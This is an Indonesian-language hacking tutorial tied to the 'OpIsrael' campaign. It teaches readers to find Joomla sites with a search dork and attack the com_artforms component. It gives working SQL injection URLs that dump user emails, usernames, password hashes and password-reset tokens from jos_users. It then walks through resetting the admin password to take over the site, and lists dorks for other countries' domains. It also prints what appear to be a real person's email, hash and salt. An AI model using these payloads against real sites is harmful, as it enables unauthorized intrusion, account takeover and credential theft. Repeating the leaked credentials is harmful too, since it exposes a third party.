Oke Di Suasana OpIsrael ini , saya akan share exploit yang sering saya gunakan untuk mencari target ..
maklum lah bukan hacker jadi cuma bisa mainan exploit deh :(
Oke Langsung saja ...
Dork : inurl:"option co_artforms" site: ( isi nama situs negara yang menjadi target )
* Notice : Jangan Serang Situs .id
Exploit : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Exploit Token : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users--
Login : /administrator
Reset Password : /index.php?option=com_user&view=reset
Oke Sekarang Saya Kasih Tutorialnya ..
Pertama Siapkan Target
Contoh : www.target.com
Sekarang Coba Pasang Exploitnya
Menjadi :
www.target.il/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Disana anda akan mendapatkan sebuah kode seperti ini :
osh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P
Oke selanjutnya coba reset passwordnya.
www.target.il/index.php?option=com_user&view=reset
dan sekarang masukkan e-mail yang kita dapat tadi
adminjosh@bkmediagroup.com
Dan anda nanti akan diminta untuk memasukkan TOKEN
" Tokennya yang mana ? "
oke kita temukan dengan exploit
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users--
dan kita dapatkan sesuatu
admineda7d6142fac40a533b56407a4617371
admin = username
eda7d6142fac40a533b56407a4617371 = TOKEN
Oke sekarang tinggal anda reset passwordnya !
Dan...
BINGO !!
Congrats !!
Sekian tutorial kali ini, semoga bermanfaat guys.
CREATED "IeLham Ridho Kurniawan'Sanz"
inurl:"option co_artforms" site:.se
site:.ph
site:.ru
Site:.us
site:.br
Kembangin aja Disitu
Masih Banyak Kok :D